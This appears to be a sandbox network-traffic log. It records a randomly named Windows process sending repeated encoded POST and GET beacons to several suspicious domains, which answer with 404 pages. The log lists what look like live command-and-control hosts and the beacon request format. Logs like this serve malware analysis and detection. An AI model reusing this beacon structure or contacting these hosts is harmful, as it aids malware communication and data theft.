Oct 24, 2024 15:17:50.661396980 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:50 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49877 | 162.0.215.33 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:17:52.541713953 CEST | 787 | OUT | POST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyzd2xgjS5UoOY02uW4mhOEKz2JnqH8Pq60vDW+LaWGOoOLDgXR35DbvHnLK/n2yOOFSaZjRuTa2Cc1byNZBv9Kykjxt4E46VF1utZYs1iv/UVxFPUiCnrD/YOtFhmL2bFuKtcKCTjHqMLyWsStSyO4aZltPfKLA2txdbin4Svx/7UkD4jHdb9HezNEbLx9xEHKgAmLIB/sGKsgfLM
Oct 24, 2024 15:17:53.204755068 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:53 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49893 | 162.0.215.33 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:17:55.094186068 CEST | 1804 | OUT | POST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:17:55.799773932 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:55 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49908 | 162.0.215.33 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:17:57.635550976 CEST | 491 | OUT | GET /4bpc/?7Bohe=W6c12MBAM7+Q3p2I42CNcaaX4meOt2NlPYb0dUqqy/7eqOW0wKa7H8cBCmolVGR7OaXpdOvS7kWyFQKJ7xuZambhzJ6Jbz/iDls78L0zlt4s48FcRMJ2uoIWwWqypjO6Yg==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:17:58.289444923 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:58 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: 278F<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Oct 24, 2024 15:17:58.289788008 CEST | 857 | IN |
                                                                                                                                                                                                                                              Data Ascii: class="info-image" /> <div class="info-heading"> www.nieuws-july202491.sbs/cp_errordocument.shtml (port 80) </div> </li>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49940 | 154.7.176.67 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:03.374195099 CEST | 749 | OUT | POST /oacu/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Origin: http://www.putizhong.homes
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.putizhong.homes/oacu/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=dw2lTJNCHhilFJK+a9Nmm5ez0qYfgMe7ixTp6J0ENJm7t6RoTfyoFyHrQfSAI1ECkFqnqFPujf11O6YGLVhM/OilILGtl57b2cCcyxtlQZM3DEUINb7macsHFZk64CM1pBCeox/t7sOGLlcrTytMpm0RqpBToXqQhvUW6lkXZmhXt/41ihdNW5r2awsVSwDTBkFb8Rg=
Oct 24, 2024 15:18:04.033938885 CEST | 685 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49956 | 154.7.176.67 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:06.053886890 CEST | 769 | OUT | POST /oacu/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Origin: http://www.putizhong.homes
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.putizhong.homes/oacu/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=dw2lTJNCHhilKIa+Zahm3pesxqYfusegixXp6IAuNby7tYJoSeyoEyHrb/S/QVEZkFnaqEjujbV1O/0GLidP5eijArGvrZ7b2cCcyx5bQfk3D0EIM67lT8sETJk6ziMxpBC8owTL7uGGLlMrSgFP6G0XgJA97Xbph9Nb1UEeEQR8lpVf4DVlFZHOKjkiDAi6bHVriG1bFOIDxQyypVPS1kDuKtDZ
Oct 24, 2024 15:18:06.669924021 CEST | 685 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49972 | 154.7.176.67 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:08.641904116 CEST | 1786 | OUT | POST /oacu/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Origin: http://www.putizhong.homes
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.putizhong.homes/oacu/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=dw2lTJNCHhilKIa+Zahm3pesxqYfusegixXp6IAuNaK7tppoT9aoHyHrHPSEQVEYkF/WqE/YjZt1OZgGNWJPweijMLGil57C2YuYyxpbQfk3DyoIFL7lV8sHFZk+4CMZpB6GownE6emGKE8rf1ZPgG0VjJAT7XXIh9Ao1UhDEX980uooswNtW/beFRwdZQqLRmF/iWpbE/Yh/AyY8Wjer1fPPZnT5W4pEEllGR0O1zV+yIo5fvIgSYJ7tPWoC4TQhBHLpkwsKXQCIInEgszkgAeI3uNMY03f/i7JHOV3GBP2trhvJuOUKuofQlHAH3JraDgmiu1A5jVElhYNSl1UaNcF9ht+4QwKqqK7sFocufVE/hzK1peMBPdGOqELc/WxyOyvUMXdN3QXx2WbeefWbyXICQnNYPCIEhgcgn9JEMuIXe9kct+/cvZ8+hHJyQ96Q2gollf2FmfyfYTZU9vA39EmZGlYASidzMcHF1kWbob3l0VFZ5WPz5HF3WZlHIU6h41wz/lwDfaLALXQO95TyIFxsksqmgTVdO2Wns7sYIQZDOtTMV893B/ZzglGWpGARajI95AHRoH1QdqbT41A559LSX/cLMsaZqBzkhmjB0cDt1C9qL56Ni/Lq2Uaupq//+63eaIZ9JRupFtB6KusZDrIPVyV/fUS1XIYDN7ZIapWqz0NZzcwFFT+O2bRP9IJ9JCwkBKZ0rHyUZ+vrxbxuMLBGLR8aQqnxYsu4nc8nWjYnBJ+UzWlq0FjorT/2I3Zjy+O0IlHgtlnG11NqtM4WrL5bFrwd8F0tgWhcsyQPxbpUlVJt9CLTl1oYuEgSSEESx7CmFZr+RyQ85+rTWJDd3wEvaWyDmUeWoqE12EUH80jqn3q16W3M4+bERTZ9vpnz2UuG3AT35t5yNkJY3C7AMug19g4Lh9+Tr6cLNvTD9EweuzdyQwyy2sIuMvliJFAvc61Y7oA4zGKZ7zeX4T5nHQw2phoavneIjXbSXK1xQejKv [TRUNCATED]
Oct 24, 2024 15:18:09.268960953 CEST | 685 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49988 | 154.7.176.67 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:11.178035975 CEST | 485 | OUT | GET /oacu/?vD=h0e85v&7Bohe=QyeFQ+FiMQKSKdq/BKxG+5Ov1bwmlN3FnlPZyKM2ZYbXsZFvV/O3NTv6ZfeubWU6jSKaxDXQpId5DKUlUVN54eSFHJCOrp//l7em+zpeeu1iGig/Io/KcJQlUpo44DFlsQ== HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.putizhong.homes
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:18:11.826174021 CEST | 685 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 520
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              ETag: "6632e438-208"
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49991 | 118.139.178.37 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:16.916616917 CEST | 740 | OUT | POST /o55g/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.coba168.info
                                                                                                                                                                                                                                              Origin: http://www.coba168.info
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.coba168.info/o55g/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=flFgbXaZRvx9XRv3YwW6hsij6u/ATKP8O3XXbUznLT/+agQ5JE8tQbv2nr6hBdMvGtlailK6fl37E1Dh7l3rwrnel72SOvaPOibLLSxjrTofOfT4B0xC6tODYYyODetbu0om2FLh+stltit2Udb/C0OhXMJc9r/5xffH7E+GysqIynOhxcK1jfM568o0k11aVq38K6g=
Oct 24, 2024 15:18:18.102643967 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:17 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.23
                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                              Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.coba168.info/xmlrpc.php" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.7 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - coba168 </title><meta property="og:locale" content="th_TH" /><meta property="og:title" content="Page not found - coba168


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49992 | 118.139.178.37 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:18:19.466129065 CEST | 760 | OUT | POST /o55g/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.coba168.info
                                                                                                                                                                                                                                              Origin: http://www.coba168.info
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.coba168.info/o55g/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=flFgbXaZRvx9Vw/3U3q6psik1O/AYqOUOwfXbRD3Lhb+bBg5IF8tTbv2oL6gM9MkGtolilG6flj7E3bh7yjoy7nLpb2QQfaPOibLLSlFrTgfOsL4BVxFkdOAIIyOVutAu0pF2H+E+ppltnR2Uon+M0OnKcIy0eSwpJqM4FPAnfSd+xjLr+Cdw/gBqvgD1FUzPJnMUt0Xy5xf9/c4dw6lvUwQzLPV
Oct 24, 2024 15:18:20.660245895 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:20 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.23
                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                              Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.coba168.info/xmlrpc.php" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.7 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - coba168 </title><meta property="og:locale" content="th_TH" /><meta property="og:title" content="Page not found - coba168
                                                                                                                                                                                                                                              Data Ascii: width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.ca
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660480022 CEST1236INData Raw: 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22
                                                                                                                                                                                                                                              Data Ascii: \u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc6
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660501957 CEST1236INData Raw: 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 26 26 22 75 6e
                                                                                                                                                                                                                                              Data Ascii: }();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660530090 CEST1236INData Raw: 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69
                                                                                                                                                                                                                                              Data Ascii: id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660553932 CEST1236INData Raw: 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d
                                                                                                                                                                                                                                              Data Ascii: eset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660581112 CEST1236INData Raw: 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e
                                                                                                                                                                                                                                              Data Ascii: ,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45)
